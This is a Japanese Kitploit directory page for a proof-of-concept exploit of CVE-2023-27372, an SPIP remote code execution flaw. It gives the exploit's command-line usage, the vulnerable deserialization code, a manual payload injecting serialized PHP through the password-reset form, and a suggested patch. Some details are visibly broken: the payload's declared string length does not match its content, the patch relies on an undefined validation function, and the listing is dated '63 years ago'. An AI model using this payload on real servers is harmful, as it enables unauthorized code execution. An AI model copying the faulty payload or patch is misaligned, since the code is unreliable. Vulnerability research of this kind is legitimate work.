Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-27372-PoC — これはCVE-2023-27372のPoCで、完全な対話型シェルを起動します。 | Kitploit
ツール/GitHubGitHub/0spwn/cve-2023-27372-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHub0spwn/cve-2023-27372-poc

CVE-2023-27372-PoC

これはCVE-2023-27372のPoCで、完全な対話型シェルを起動します。

リポジトリを見る
63年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

このPoCはすぐに書かれたもので、特別なものではありません。

これは新しいCVE-2023-27372 SPIP RCE脆弱性を悪用します。

これは、パスワードリセット機能(spip.php?page=spip_pass)内で#ENVタグの危険な使用を悪用する逆シリアル化の欠陥であり、"/ecrire/balise/formulaire_.php"の特に以下の行です:

  1. 構文: python3 exploit.py -u http(s)://url.com
root@kitploit:~
function protege_champ($texte){

	if (is_array($texte))

		$texte = array_map('protege_champ',$texte);

	else {

		// ne pas corrompre une valeur serialize

		if (preg_match(",^[abis]:\d+[:;],", $texte) AND unserialize($texte)!=false)

			return $texte;

		$texte = entites_html($texte);

		$texte = str_replace("'","'",$texte);

	}

	return $texte;

}

protege_champ関数にはさまざまな欠陥があります。入力の検証に使用される正規表現(RE)チェックには欠陥があり、簡単にバイパスできます。コードは適切な検証なしにunserialize関数を呼び出し、任意のコードの実行を許可します。手動での悪用は非常に簡単に行えます。例えば、phpinfo();を実行したい場合は、次のようにします:

root@kitploit:~
oubli=s:19:"<?phpinfo(); ?>";

サーバーが期待される出力を返す場合、脆弱です。どのようにパッチを当てるのでしょうか?実際にはかなり簡単です。以下に、基本的なパッチを書きました:

root@kitploit:~
function protege_champ($texte) {

  if (is_array($texte)) {

    $texte = array_map('protege_champ', $texte);

  } else {

    if (!isValidInput($texte)) {

      $texte = 'Malicious input detected';

    } else {

      $texte = entites_html($texte);

      $texte = str_replace("'", "&#39;", $texte);

    }

  }

  return $texte;

}

パッチ適用後のprotege_champ関数は、入力検証、サニタイズ、および悪意のある入力の処理を含みます。

悪意のある目的で使用しないでください。ありがとうございます。

<a href=https://twitter.com/0SPwn>Twitter

ツールをダウンロード